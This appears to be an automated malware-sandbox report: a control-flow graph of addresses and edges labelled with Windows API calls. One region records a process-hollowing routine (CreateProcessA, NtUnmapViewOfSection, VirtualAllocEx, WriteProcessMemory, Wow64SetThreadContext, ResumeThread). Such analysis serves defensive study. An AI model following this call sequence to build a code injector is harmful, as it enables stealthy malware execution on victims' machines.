36201 5909740 36200->36201 36202 59097bb 36201->36202 36208 5909890 36201->36208 36202->36197 36205 590974f 36204->36205 36206 59097bb 36205->36206 36207 5909890 2 API calls 36205->36207 36206->36197 36207->36206 36212 5909cd0 36208->36212 36219 5909ac0 36208->36219 36209 59098aa 36209->36202 36213 5909d2d 36212->36213 36214 5909d73 36213->36214 36215 5909d6b 36213->36215 36217 5909d78 36213->36217 36226 59098c0 36215->36226 36217->36214 36230 59003f0 36217->36230 36221 5909cd0 36219->36221 36220 5909d73 36221->36220 36222 5909d78 36221->36222 36223 5909d6b 36221->36223 36222->36220 36225 59003f0 EnumThreadWindows 36222->36225 36224 59098c0 PostThreadMessageW 36223->36224 36224->36220 36225->36220 36227 59098cb PostThreadMessageW 36226->36227 36229 590a03b 36227->36229 36229->36214 36231 59003fb 36230->36231 36235 590ad00 36231->36235 36239 590acf0 36231->36239 36232 590ac6b 36232->36214 36236 590ad4f 36235->36236 36243 59099c4 36236->36243 36240 590ad00 36239->36240 36241 59099c4 EnumThreadWindows 36240->36241 36242 590add0 36241->36242 36242->36232 36245 590adf0 EnumThreadWindows 36243->36245 36246 590add0 36245->36246 36246->36232 36247 17dd01c 36248 17dd034 36247->36248 36252 17dd08e 36248->36252 36254 58a1aa8 36248->36254 36259 58a1a97 36248->36259 36264 58a2818 36248->36264 36269 58a2808 36248->36269 36255 58a1ace 36254->36255 36257 58a2808 13 API calls 36255->36257 36258 58a2818 13 API calls 36255->36258 36256 58a1aef 36256->36252 36257->36256 36258->36256 36260 58a1ace 36259->36260 36262 58a2808 13 API calls 36260->36262 36263 58a2818 13 API calls 36260->36263 36261 58a1aef 36261->36252 36262->36261 36263->36261 36265 58a2845 36264->36265 36266 58a2877 36265->36266 36274 58a2d88 36265->36274 36279 58a2da8 36265->36279 36270 58a2845 36269->36270 36271 58a2877 36270->36271 36272 58a2d88 13 API calls 36270->36272 36273 58a2da8 13 API calls 36270->36273 36272->36271 36273->36271 36276 58a2dbc 36274->36276 36275 58a2e48 36275->36266 36284 58a2e4f 36276->36284 36291 58a2e60 36276->36291 36281 58a2dbc 36279->36281 36280 58a2e48 36280->36266 36282 58a2e4f 13 API calls 36281->36282 36283 58a2e60 13 API calls 36281->36283 36282->36280 36283->36280 36285 58a2e71 36284->36285 36298 58a3420 36284->36298 36308 58a4023 36284->36308 36312 58a3413 36284->36312 36322 58a8e41 36284->36322 36342 58a8e50 36284->36342 36285->36275 36292 58a2e71 36291->36292 36293 58a3413 3 API calls 36291->36293 36294 58a4023 2 API calls 36291->36294 36295 58a3420 3 API calls 36291->36295 36296 58a8e50 13 API calls 36291->36296 36297 58a8e41 13 API calls 36291->36297 36292->36275 36293->36292 36294->36292 36295->36292 36296->36292 36297->36292 36299 58a346c 36298->36299 36300 58a38b3 36299->36300 36302 58a34bd 36299->36302 36303 58a34b0 36299->36303 36362 58a2d5c 36300->36362 36302->36285 36303->36302 36304 58a3e2e 36303->36304 36377 58a31bc 36303->36377 36304->36302 36367 58a9673 36304->36367 36372 58a9680 36304->36372 36310 58a4040 CallWindowProcW 36308->36310 36311 58a4050 CallWindowProcW 36308->36311 36309 58a403a 36309->36285 36310->36309 36311->36309 36313 58a346c 36312->36313 36314 58a34bd 36313->36314 36315 58a38b3 36313->36315 36317 58a34b0 36313->36317 36314->36285 36314->36314 36316 58a2d5c 2 API calls 36315->36316 36316->36314 36317->36314 36318 58a3e2e 36317->36318 36319 58a31bc SendMessageW 36317->36319 36318->36314 36320 58a9673 2 API calls 36318->36320 36321 58a9680 2 API calls 36318->36321 36319->36317 36320->36314 36321->36314 36323 58a8e50 36322->36323 36324 58a8e6e 36323->36324 36325 58a8eb0 36323->36325 36332 58a8e85 36323->36332 36326 58a8e8a 36324->36326 36327 58a8e73 36324->36327 36330 58a913c 36325->36330 36325->36332 36326->36332 36335 58a90a8 36326->36335 36336 58a9104 36326->36336 36340 58a8fb6 36326->36340 36328 58a909a 36327->36328 36329 58a8e7c 36327->36329 36388 58a8430 36328->36388 36329->36332 36333 58a9112 36329->36333 36403 58a8a9c 36330->36403 36332->36340 36409 58a95e0 36332->36409 36420 58a8a6c SendMessageW CallWindowProcW CallWindowProcW 36333->36420 36414 58a8440 36335->36414 36399 58a8a5c 36336->36399 36340->36285 36343 58a8e69 36342->36343 36350 58a8e85 36342->36350 36344 58a8e6e 36343->36344 36345 58a8eb0 36343->36345 36346 58a8e73 36344->36346 36353 58a8e8a 36344->36353 36349 58a913c 36345->36349 36345->36350 36347 58a909a 36346->36347 36348 58a8e7c 36346->36348 36354 58a8430 13 API calls 36347->36354 36348->36350 36352 58a9112 36348->36352 36351 58a8a9c 9 API calls 36349->36351 36360 58a8fb6 36350->36360 36361 58a95e0 3 API calls 36350->36361 36351->36360 36700 58a8a6c SendMessageW CallWindowProcW CallWindowProcW 36352->36700 36353->36350 36355 58a90a8 36353->36355 36356 58a9104 36353->36356 36353->36360 36354->36360 36358 58a8440 7 API calls 36355->36358 36359 58a8a5c 3 API calls 36356->36359 36358->36360 36359->36360 36360->36285 36361->36360 36363 58a2d67 36362->36363 36365 58a9673 2 API calls 36363->36365 36366 58a9680 2 API calls 36363->36366 36364 58ab5dc 36364->36302 36365->36364 36366->36364 36368 58a96c6 36367->36368 36369 58a96e9 36368->36369 36380 58a4040 36368->36380 36384 58a4050 36368->36384 36369->36302 36373 58a96c6 36372->36373 36374 58a96e9 36373->36374 36375 58a4040 CallWindowProcW 36373->36375 36376 58a4050 CallWindowProcW 36373->36376 36374->36302 36375->36374 36376->36374 36378 58ae9b0 SendMessageW 36377->36378 36379 58aea1c 36378->36379 36379->36303 36381 58a4050 36380->36381 36382 58a40ea CallWindowProcW 36381->36382 36383 58a4099 36381->36383 36382->36383 36383->36369 36385 58a4092 36384->36385 36387 58a4099 36384->36387 36386 58a40ea CallWindowProcW 36385->36386 36385->36387 36386->36387 36387->36369 36389 58a843b 36388->36389 36390 58a95e0 3 API calls 36389->36390 36392 58a97f6 36390->36392 36391 58a9851 36391->36340 36392->36391 36393 58a982c 36392->36393 36394 58a9835 36392->36394 36395 58a9831 36393->36395 36397 58a560c 11 API calls 36393->36397 36421 58a560c 36394->36421 36395->36340 36397->36391 36398 58a9841 36398->36340 36400 58a8a67 36399->36400 36401 58a95e0 3 API calls 36400->36401 36402 58af89c 36401->36402 36402->36340 36404 58a8aa7 36403->36404 36405 58a8440 7 API calls 36404->36405 36406 58ab608 36405->36406 36407 58a95e0 3 API calls 36406->36407 36408 58ab611 36407->36408 36408->36340 36410 58a95eb 36409->36410 36411 58a95f2 36409->36411 36410->36340 36692 58a9600 36411->36692 36412 58a95f8 36412->36340 36416 58a844b 36414->36416 36415 58ab86f 36415->36340 36416->36415 36417 58a4330 7 API calls 36416->36417 36418 58ab68c 36417->36418 36418->36415 36419 58a567c 7 API calls 36418->36419 36419->36415 36420->36340 36422 58a5617 36421->36422 36423 58a733b 36422->36423 36425 58a7400 36422->36425 36427 58a7353 36423->36427 36447 58a4330 36423->36447 36424 58a7499 36438 58a74d0 36424->36438 36442 58a74c0 36424->36442 36425->36424 36429 58a745a 36425->36429 36427->36398 36428 58a74b4 36428->36398 36434 58a6d94 36429->36434 36436 58a6d9f 36434->36436 36452 58a6e1c 36436->36452 36437 58a761c 36513 58a74f8 36438->36513 36517 58a74e9 36438->36517 36441 58a74d9 36441->36428 36443 58a74d0 36442->36443 36444 58a74f8 11 API calls 36443->36444 36445 58a74e9 11 API calls 36443->36445 36446 58a74d9 36444->36446 36445->36446 36446->36428 36448 58a4340 36447->36448 36449 58a437d 36448->36449 36531 58a8488 36448->36531 36561 58a8498 36448->36561 36449->36427 36455 58a6e27 36452->36455 36453 58a7b36 36454 58a7c91 36453->36454 36456 58a76e8 8 API calls 36453->36456 36457 58a7ccb 36454->36457 36466 5902014 36454->36466 36473 5902020 36454->36473 36455->36453 36455->36457 36461 58a76e8 36455->36461 36456->36454 36457->36437 36462 58a76f3 36461->36462 36480 58a6fd8 36462->36480 36495 58a6fe8 36462->36495 36463 58a7f44 36463->36453 36468 5902085 36466->36468 36467 59020d2 36467->36457 36468->36467 36469 59022b1 36468->36469 36470 59003c0 PeekMessageW 36468->36470 36510 590040c 36468->36510 36471 59003f0 EnumThreadWindows 36469->36471 36470->36468 36471->36467 36478 5902085 36473->36478 36474 59003c0 PeekMessageW 36474->36478 36475 59022b1 36476 59003f0 EnumThreadWindows 36475->36476 36479 59020d2 36476->36479 36477 590040c DispatchMessageW 36477->36478 36478->36474 36478->36475 36478->36477 36478->36479 36479->36457 36484 58a700e 36480->36484 36481 58a7022 36481->36463 36482 58a70ff 36493 182dd10 7 API calls 36482->36493 36494 182dd20 7 API calls 36482->36494 36483 58a710d 36485 58a4330 7 API calls 36483->36485 36488 58a715d 36483->36488 36484->36481 36484->36482 36489 58a7162 36484->36489 36486 58a7135 36485->36486 36487 58a6cbc PostMessageW 36486->36487 36487->36488 36488->36463 36489->36488 36490 58a4330 7 API calls 36489->36490 36491 58a7207 36490->36491 36491->36488 36492 58a566c 7 API calls 36491->36492 36492->36488 36493->36483 36494->36483 36499 58a700e 36495->36499 36496 58a7022 36496->36463 36497 58a70ff 36508 182dd10 7 API calls 36497->36508 36509 182dd20 7 API calls 36497->36509 36498 58a710d 36500 58a4330 7 API calls 36498->36500 36503 58a715d 36498->36503 36499->36496 36499->36497 36504 58a7162 36499->36504 36501 58a7135 36500->36501 36502 58a6cbc PostMessageW 36501->36502 36502->36503 36503->36463 36504->36503 36505 58a4330 7 API calls 36504->36505 36506 58a7207 36505->36506 36506->36503 36507 58a566c 7 API calls 36506->36507 36507->36503 36508->36498 36509->36498 36511 5902d88 DispatchMessageW 36510->36511 36512 5902df4 36511->36512 36512->36468 36514 58a7501 36513->36514 36516 58a6e1c 11 API calls 36513->36516 36522 58a7a59 36513->36522 36514->36441 36516->36514 36518 58a74f2 36517->36518 36519 58a7501 36517->36519 36518->36519 36520 58a7a59 11 API calls 36518->36520 36521 58a6e1c 11 API calls 36518->36521 36519->36441 36520->36519 36521->36519 36523 58a7a68 36522->36523 36526 58a76e8 8 API calls 36523->36526 36527 58a7b36 36523->36527 36528 58a7ccb 36523->36528 36524 58a76e8 8 API calls 36525 58a7c91 36524->36525 36525->36528 36529 5902020 3 API calls 36525->36529 36530 5902014 3 API calls 36525->36530 36526->36527 36527->36524 36527->36525 36528->36514 36529->36528 36530->36528 36532 58a8498 36531->36532 36537 58a856f 36532->36537 36591 182fa10 36532->36591 36596 182fa28 36532->36596 36534 58a85db 36607 58a566c 36534->36607 36536 58a85e5 36623 58a567c 36536->36623 36601 58a8204 36537->36601 36541 58a8614 36542 58a8705 36541->36542 36543 58a4330 7 API calls 36541->36543 36652 58a65c0 36542->36652 36656 58a65b0 36542->36656 36544 58a869d 36543->36544 36634 58a8278 36544->36634 36546 58a86ac 36639 58a56a8 36546->36639 36547 58a876c 36549 58a86c7 36549->36542 36550 58a8278 2 API calls 36549->36550 36551 58a86d7 36550->36551 36551->36542 36552 58a8278 2 API calls 36551->36552 36553 58a86e8 36552->36553 36645 58a56c8 36553->36645 36555 58a86f7 36556 58a31bc SendMessageW 36555->36556 36556->36542 36562 58a84d1 36561->36562 36567 58a856f 36562->36567 36589 182fa10 2 API calls 36562->36589 36590 182fa28 2 API calls 36562->36590 36563 58a8204 7 API calls 36564 58a85db 36563->36564 36565 58a566c 7 API calls 36564->36565 36566 58a85e5 36565->36566 36568 58a567c 7 API calls 36566->36568 36567->36563 36569 58a85ed 36568->36569 36570 58a8238 7 API calls 36569->36570 36571 58a8614 36569->36571 36570->36571 36572 58a8705 36571->36572 36573 58a4330 7 API calls 36571->36573 36587 58a65b0 7 API calls 36572->36587 36588 58a65c0 7 API calls 36572->36588 36574 58a869d 36573->36574 36575 58a8278 2 API calls 36574->36575 36576 58a86ac 36575->36576 36578 58a56a8 3 API calls 36576->36578 36577 58a876c 36579 58a86c7 36578->36579 36579->36572 36580 58a8278 2 API calls 36579->36580 36581 58a86d7 36580->36581 36581->36572 36582 58a8278 2 API calls 36581->36582 36583 58a86e8 36582->36583 36584 58a56c8 7 API calls 36583->36584 36585 58a86f7 36584->36585 36586 58a31bc SendMessageW 36585->36586 36586->36572 36587->36577 36588->36577 36589->36567 36590->36567 36592 182fa65 36591->36592 36593 182fa59 36591->36593 36592->36537 36593->36592 36660 58a09b0 36593->36660 36665 58a09c0 36593->36665 36597 182fa59 36596->36597 36598 182fa65 36596->36598 36597->36598 36599 58a09b0 2 API calls 36597->36599 36600 58a09c0 2 API calls 36597->36600 36598->36537 36599->36598 36600->36598 36604 58a820f 36601->36604 36602 58ac4b8 36602->36534 36603 58ac488 36605 58a4330 7 API calls 36603->36605 36604->36602 36604->36603 36606 58a8278 2 API calls 36604->36606 36605->36602 36606->36603 36608 58a5677 36607->36608 36609 58a56a8 3 API calls 36608->36609 36610 58a6712 36608->36610 36622 58a67f0 36608->36622 36609->36610 36611 58a6769 36610->36611 36617 58a67bc 36610->36617 36676 58a56b8 7 API calls 36610->36676 36612 58a67a2 36611->36612 36613 58a56c8 7 API calls 36611->36613 36614 58a56c8 7 API calls 36612->36614 36615 58a6794 36613->36615 36616 58a67ae 36614->36616 36670 58a56d8 36615->36670 36619 58a56d8 7 API calls 36616->36619 36620 58a4330 7 API calls 36617->36620 36617->36622 36619->36617 36620->36622 36622->36536 36625 58a5687 36623->36625 36624 58a6618 36624->36541 36629 58a8238 36624->36629 36625->36624 36626 58a4330 7 API calls 36625->36626 36627 58a6604 36626->36627 36677 58a5698 36627->36677 36631 58a8243 36629->36631 36630 58ae66e 36630->36541 36631->36630 36632 58a4330 7 API calls 36631->36632 36633 58ae73e 36632->36633 36633->36541 36635 58a8283 36634->36635 36636 58ac54b 36635->36636 36637 58a09b0 2 API calls 36635->36637 36638 58a09c0 2 API calls 36635->36638 36636->36546 36637->36636 36638->36636 36640 58a56b3 36639->36640 36641 58ac5ea 36640->36641 36681 58ac618 36640->36681 36685 58ac609 36640->36685 36641->36549 36642 58ac5f9 36642->36549 36647 58a56d3 36645->36647 36646 58ae1fe 36646->36555 36647->36646 36648 58a4330 7 API calls 36647->36648 36649 58ae258 36648->36649 36689 58acb20 36649->36689 36653 58a65cd 36652->36653 36654 58a567c 7 API calls 36653->36654 36655 58a65d4 36654->36655 36655->36547 36657 58a65cd 36656->36657 36658 58a567c 7 API calls 36657->36658 36659 58a65d4 36658->36659 36659->36547 36662 58a09eb 36660->36662 36661 58a0a9a 36661->36661 36662->36661 36663 58a1890 CreateWindowExW CreateWindowExW 36662->36663 36664 58a18a0 CreateWindowExW CreateWindowExW 36662->36664 36663->36661 36664->36661 36666 58a09eb 36665->36666 36667 58a0a9a 36666->36667 36668 58a1890 CreateWindowExW CreateWindowExW 36666->36668 36669 58a18a0 CreateWindowExW CreateWindowExW 36666->36669 36668->36667 36669->36667 36671 58a56e3 36670->36671 36672 58ae258 36671->36672 36673 58a4330 7 API calls 36671->36673 36674 58acb20 SendMessageW 36672->36674 36673->36672 36675 58ae269 36674->36675 36675->36612 36676->36611 36678 58a56a3 36677->36678 36679 58a8440 7 API calls 36678->36679 36680 58ae3dc 36679->36680 36680->36624 36682 58ac68a 36681->36682 36683 58ac639 36681->36683 36682->36642 36683->36682 36684 58abdec CreateIconFromResourceEx CreateIconFromResourceEx CreateIconFromResourceEx 36683->36684 36684->36682 36687 58ac618 36685->36687 36686 58ac68a 36686->36642 36687->36686 36688 58abdec CreateIconFromResourceEx CreateIconFromResourceEx CreateIconFromResourceEx 36687->36688 36688->36686 36690 58ae280 SendMessageW 36689->36690 36691 58ae269 36690->36691 36691->36555 36693 58a961e 36692->36693 36694 58a9640 36692->36694 36696 58a3420 3 API calls 36693->36696 36697 58a962c 36693->36697 36695 58a3420 3 API calls 36694->36695 36699 58a9647 36695->36699 36698 58a9668 36696->36698 36697->36412 36698->36412 36699->36412 36700->36360 36701 58a5aac 36702 58a5ab5 36701->36702 36704 58a5ad3 36701->36704 36703 58a4330 7 API calls 36702->36703 36702->36704 36703->36704 36705 58a4330 7 API calls 36704->36705 36706 58a5c0c 36704->36706 36705->36706 36707 58a6260 36708 58a626d 36707->36708 36713 58a55ec 36708->36713 36710 58a6276 36711 58a560c 11 API calls 36710->36711 36712 58a62a3 36711->36712 36714 58a55f7 36713->36714 36715 58a6446 36714->36715 36716 58a566c 7 API calls 36714->36716 36715->36710 36716->36715 36717 1824668 36718 1824672 36717->36718 36725 1824760 36717->36725 36730 1824210 36718->36730 36720 1824693 36723 58a560c 11 API calls 36720->36723 36734 58a72f8 36720->36734 36721 182469b 36723->36721 36726 1824765 36725->36726 36747 1824860 36726->36747 36751 1824870 36726->36751 36731 182421b 36730->36731 36759 1825c4c 36731->36759 36733 1826fbb 36733->36720 36735 58a7308 36734->36735 36736 58a733b 36735->36736 36738 58a7400 36735->36738 36739 58a4330 7 API calls 36736->36739 36740 58a7353 36736->36740 36737 58a7499 36745 58a74c0 11 API calls 36737->36745 36746 58a74d0 11 API calls 36737->36746 36738->36737 36742 58a745a 36738->36742 36739->36740 36740->36721 36741 58a74b4 36741->36721 36743 58a6d94 11 API calls 36742->36743 36744 58a7492 36743->36744 36744->36721 36745->36741 36746->36741 36749 1824897 36747->36749 36748 1824974 36748->36748 36749->36748 36755 18244d4 36749->36755 36752 1824897 36751->36752 36753 18244d4 CreateActCtxA 36752->36753 36754 1824974 36752->36754 36753->36754 36756 1825900 CreateActCtxA 36755->36756 36758 18259c3 36756->36758 36760 1825c57 36759->36760 36763 1825c6c 36760->36763 36762 18270a5 36762->36733 36764 1825c77 36763->36764 36767 1825c9c 36764->36767 36766 1827182 36766->36762 36768 1825ca7 36767->36768 36771 1825ccc 36768->36771 36770 1827285 36770->36766 36772 1825cd7 36771->36772 36774 182858b 36772->36774 36777 182ac3b 36772->36777 36773 18285c9 36773->36770 36774->36773 36781 182cd30 36774->36781 36786 182ac70 36777->36786 36790 182ac5f 36777->36790 36778 182ac4e 36778->36774 36782 182cd51 36781->36782 36783 182cd75 36782->36783 36804 182cee0 36782->36804 36808 182ced1 36782->36808 36783->36773 36787 182ac7f 36786->36787 36794 182ad58 36786->36794 36799 182ad68 36786->36799 36787->36778 36792 182ad58 GetModuleHandleW 36790->36792 36793 182ad68 GetModuleHandleW 36790->36793 36791 182ac7f 36791->36778 36792->36791 36793->36791 36795 182ad9c 36794->36795 36796 182ad79 36794->36796 36795->36787 36796->36795 36797 182afa0 GetModuleHandleW 36796->36797 36798 182afcd 36797->36798 36798->36787 36800 182ad9c 36799->36800 36801 182ad79 36799->36801 36800->36787 36801->36800 36802 182afa0 GetModuleHandleW 36801->36802 36803 182afcd 36802->36803 36803->36787 36805 182ceed 36804->36805 36806 182cf27 36805->36806 36812 182b740 36805->36812 36806->36783 36809 182cee0 36808->36809 36810 182cf27 36809->36810 36811 182b740 9 API calls 36809->36811 36810->36783 36811->36810 36813 182b74b 36812->36813 36815 182dc38 36813->36815 36816 182d044 36813->36816 36815->36815 36817 182d04f 36816->36817 36818 1825ccc 9 API calls 36817->36818 36819 182dca7 36818->36819 36820 182dcb6 36819->36820 36826 182dd10 36819->36826 36831 182dd20 36819->36831 36824 182fa10 2 API calls 36820->36824 36825 182fa28 2 API calls 36820->36825 36821 182dce1 36821->36815 36824->36821 36825->36821 36827 182dd4e 36826->36827 36828 182ddc6 36827->36828 36829 58a43f0 7 API calls 36827->36829 36830 58a4330 7 API calls 36827->36830 36829->36828 36830->36828 36832 182dd4e 36831->36832 36833 182ddc6 36832->36833 36834 58a43f0 7 API calls 36832->36834 36835 58a4330 7 API calls 36832->36835 36834->36833 36835->36833 35977 590471c 35978 5904721 35977->35978 35979 5904791 35978->35979 35990 59060c6 35978->35990 36001 5906344 35978->36001 36017 59060f4 35978->36017 36031 5906644 35978->36031 36050 59063e4 35978->36050 36055 59063bf 35978->36055 36062 590636d 35978->36062 36069 59066ad 35978->36069 36083 5906607 35978->36083 36090 59062e7 35978->36090 36109 5906e50 35990->36109 36113 5906e58 35990->36113 35991 59060e2 35992 59060da 35992->35991 36125 5906f10 35992->36125 36129 5906f09 35992->36129 35993 5906475 35993->35978 35994 5906391 35994->35993 36117 5906d68 35994->36117 36121 5906d60 35994->36121 36133 5906ba9 36001->36133 36137 5906bb0 36001->36137 36002 5906274 36003 5906507 36002->36003 36006 59066de 36002->36006 36011 5906d60 WriteProcessMemory 36002->36011 36012 5906d68 WriteProcessMemory 36002->36012 36141 5906c80 36002->36141 36145 5906c88 36002->36145 36013 5906f10 VirtualAllocEx 36003->36013 36014 5906f09 VirtualAllocEx 36003->36014 36004 5906475 36004->35978 36005 5906391 36005->36004 36007 5906d60 WriteProcessMemory 36005->36007 36008 5906d68 WriteProcessMemory 36005->36008 36007->36005 36008->36005 36011->36002 36012->36002 36013->36005 36014->36005 36018 59060fe 36017->36018 36019 5906507 36018->36019 36021 59066de 36018->36021 36023 5906d60 WriteProcessMemory 36018->36023 36024 5906d68 WriteProcessMemory 36018->36024 36027 5906c80 ReadProcessMemory 36018->36027 36028 5906c88 ReadProcessMemory 36018->36028 36029 5906f10 VirtualAllocEx 36019->36029 36030 5906f09 VirtualAllocEx 36019->36030 36020 5906391 36022 5906475 36020->36022 36025 5906d60 WriteProcessMemory 36020->36025 36026 5906d68 WriteProcessMemory 36020->36026 36022->35978 36023->36018 36024->36018 36025->36020 36026->36020 36027->36018 36028->36018 36029->36020 36030->36020 36033 59062e7 36031->36033 36032 5906657 36033->36031 36033->36032 36035 5906274 36033->36035 36149 5906828 36033->36149 36153 590681d 36033->36153 36157 590676f 36033->36157 36034 5906507 36041 5906f10 VirtualAllocEx 36034->36041 36042 5906f09 VirtualAllocEx 36034->36042 36035->36034 36037 5906551 36035->36037 36039 5906c80 ReadProcessMemory 36035->36039 36040 5906c88 ReadProcessMemory 36035->36040 36046 5906d60 WriteProcessMemory 36035->36046 36047 5906d68 WriteProcessMemory 36035->36047 36036 5906391 36038 5906475 36036->36038 36048 5906d60 WriteProcessMemory 36036->36048 36049 5906d68 WriteProcessMemory 36036->36049 36038->35978 36039->36035 36040->36035 36041->36036 36042->36036 36046->36035 36047->36035 36048->36036 36049->36036 36051 59063f4 36050->36051 36053 5906d60 WriteProcessMemory 36051->36053 36054 5906d68 WriteProcessMemory 36051->36054 36052 590642c 36052->35978 36053->36052 36054->36052 36056 590636d 36055->36056 36057 59063da 36056->36057 36058 5906bb0 Wow64SetThreadContext 36056->36058 36059 5906ba9 Wow64SetThreadContext 36056->36059 36161 5906fd0 36056->36161 36165 5906fc8 36056->36165 36057->35978 36058->36056 36059->36056 36065 5906fd0 ResumeThread 36062->36065 36066 5906fc8 ResumeThread 36062->36066 36063 590637e 36063->36062 36064 5906626 36063->36064 36067 5906bb0 Wow64SetThreadContext 36063->36067 36068 5906ba9 Wow64SetThreadContext 36063->36068 36064->35978 36065->36063 36066->36063 36067->36063 36068->36063 36070 5906274 36069->36070 36070->36069 36071 59066de 36070->36071 36072 5906507 36070->36072 36077 5906d60 WriteProcessMemory 36070->36077 36078 5906d68 WriteProcessMemory 36070->36078 36081 5906c80 ReadProcessMemory 36070->36081 36082 5906c88 ReadProcessMemory 36070->36082 36079 5906f10 VirtualAllocEx 36072->36079 36080 5906f09 VirtualAllocEx 36072->36080 36073 5906391 36074 5906475 36073->36074 36075 5906d60 WriteProcessMemory 36073->36075 36076 5906d68 WriteProcessMemory 36073->36076 36074->35978 36075->36073 36076->36073 36077->36070 36078->36070 36079->36073 36080->36073 36081->36070 36082->36070 36088 5906bb0 Wow64SetThreadContext 36083->36088 36089 5906ba9 Wow64SetThreadContext 36083->36089 36084 590636d 36084->36083 36085 5906626 36084->36085 36086 5906fd0 ResumeThread 36084->36086 36087 5906fc8 ResumeThread 36084->36087 36085->35978 36086->36084 36087->36084 36088->36084 36089->36084 36100 5906828 CreateProcessA 36090->36100 36101 590681d CreateProcessA 36090->36101 36102 590676f CreateProcessA 36090->36102 36091 5906315 36091->36090 36092 5906657 36091->36092 36094 5906274 36091->36094 36093 5906507 36098 5906f10 VirtualAllocEx 36093->36098 36099 5906f09 VirtualAllocEx 36093->36099 36094->36093 36096 5906551 36094->36096 36103 5906d60 WriteProcessMemory 36094->36103 36104 5906d68 WriteProcessMemory 36094->36104 36107 5906c80 ReadProcessMemory 36094->36107 36108 5906c88 ReadProcessMemory 36094->36108 36095 5906391 36097 5906475 36095->36097 36105 5906d60 WriteProcessMemory 36095->36105 36106 5906d68 WriteProcessMemory 36095->36106 36097->35978 36098->36095 36099->36095 36100->36091 36101->36091 36102->36091 36103->36094 36104->36094 36105->36095 36106->36095 36107->36094 36108->36094 36110 5906e98 NtUnmapViewOfSection 36109->36110 36112 5906ecc 36110->36112 36112->35992 36114 5906e98 NtUnmapViewOfSection 36113->36114 36116 5906ecc 36114->36116 36116->35992 36118 5906db0 WriteProcessMemory 36117->36118 36120 5906e07 36118->36120 36120->35994 36122 5906db0 WriteProcessMemory 36121->36122 36124 5906e07 36122->36124 36124->35994 36126 5906f50 VirtualAllocEx 36125->36126 36128 5906f8d 36126->36128 36128->35994 36130 5906f50 VirtualAllocEx 36129->36130 36132 5906f8d 36130->36132 36132->35994 36134 5906bf5 Wow64SetThreadContext 36133->36134 36136 5906c3d 36134->36136 36136->36002 36138 5906bf5 Wow64SetThreadContext 36137->36138 36140 5906c3d 36138->36140 36140->36002 36142 5906cd3 ReadProcessMemory 36141->36142 36144 5906d17 36142->36144 36144->36002 36146 5906cd3 ReadProcessMemory 36145->36146 36148 5906d17 36146->36148 36148->36002 36150 59068b1 CreateProcessA 36149->36150 36152 5906a73 36150->36152 36154 5906828 CreateProcessA 36153->36154 36156 5906a73 36154->36156 36158 590679f CreateProcessA 36157->36158 36160 5906a73 36158->36160 36162 5907010 ResumeThread 36161->36162 36164 5907041 36162->36164 36164->36056 36166 5907010 ResumeThread 36165->36166 36168 5907041 36166->36168 36168->36056 36836 58a41b8 36837 58a41c8 36836->36837 36841 58aabc8 36837->36841 36847 58aabd8 36837->36847 36838 58a41f1 36842 58aabd8 36841->36842 36853 58a5800 36842->36853 36844 58aac62 36865 58a8de8 36844->36865 36846 58aac69 36846->36838 36848 58aac0d 36847->36848 36849 58a5800 7 API calls 36848->36849 36850 58aac62 36849->36850 36851 58a8de8 7 API calls 36850->36851 36852 58aac69 36851->36852 36852->36838 36854 58a582c 36853->36854 36858 58a5a64 36854->36858 36875 58a51f4 36854->36875 36856 58a5c0c 36856->36844 36857 58a58e5 36860 58a4330 7 API calls 36857->36860 36864 58a598d 36857->36864 36858->36856 36859 58a4330 7 API calls 36858->36859 36859->36856 36861 58a5957 36860->36861 36862 58a4330 7 API calls 36861->36862 36862->36864 36863 58a4330 7 API calls 36863->36858 36864->36863 36866 58a8df3 36865->36866 36867 58ab32d 36866->36867 36868 58ab365 36866->36868 36874 58ab334 36866->36874 36869 58a4330 7 API calls 36867->36869 36870 58ab38a 36868->36870 36871 58ab3b6 36868->36871 36869->36874 36873 58a4330 7 API calls 36870->36873 36872 58a4330 7 API calls 36871->36872 36872->36874 36873->36874 36874->36846 36876 58a51ff 36875->36876 36878 58a4330 7 API calls 36876->36878 36879 58a5da7 36876->36879 36880 58a5d69 36876->36880 36877 58a4330 7 API calls 36877->36880 36878->36880 36879->36857 36880->36877 36880->36879 36881 5900963 36882 5900976 36881->36882 36886 5900c10 PostMessageW 36882->36886 36888 5900c40 PostMessageW 36882->36888 36883 5900999 36887 5900cac 36886->36887 36887->36883 36889 5900cac 36888->36889 36889->36883 36169 5901a88 36170 5901d90 36169->36170 36171 5901ab0 36169->36171 36172 5901ab9 36171->36172 36175 5900348 36171->36175 36174 5901adc 36176 5900353 36175->36176 36178 5901dd3 36176->36178 36179 5900364 36176->36179 36178->36174 36180 5901e08 OleInitialize 36179->36180 36181 5901e6c 36180->36181 36181->36178 36890 59046e8 36891 5904715 36890->36891 36892 5904791 36891->36892 36893 59063e4 2 API calls 36891->36893 36894 5906644 9 API calls 36891->36894 36895 59060f4 6 API calls 36891->36895 36896 5906344 8 API calls 36891->36896 36897 59060c6 6 API calls 36891->36897 36898 59062e7 9 API calls 36891->36898 36899 5906607 4 API calls 36891->36899 36900 59066ad 6 API calls 36891->36900 36901 590636d 4 API calls 36891->36901 36902 59063bf 4 API calls 36891->36902 36893->36891 36894->36891 36895->36891 36896->36891 36897->36891 36898->36891 36899->36891 36900->36891 36901->36891 36902->36891 36903 182d3f8 36904 182d43e 36903->36904 36908 182d5c8 36904->36908 36912 182d5d8 36904->36912 36905 182d52b 36909 182d5e5 36908->36909 36915 182b750 36909->36915 36913 182d606 36912->36913 36914 182b750 DuplicateHandle 36912->36914 36913->36905 36914->36913 36916 182d640 DuplicateHandle 36915->36916 36917 182d606 36916->36917 36917->36905

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
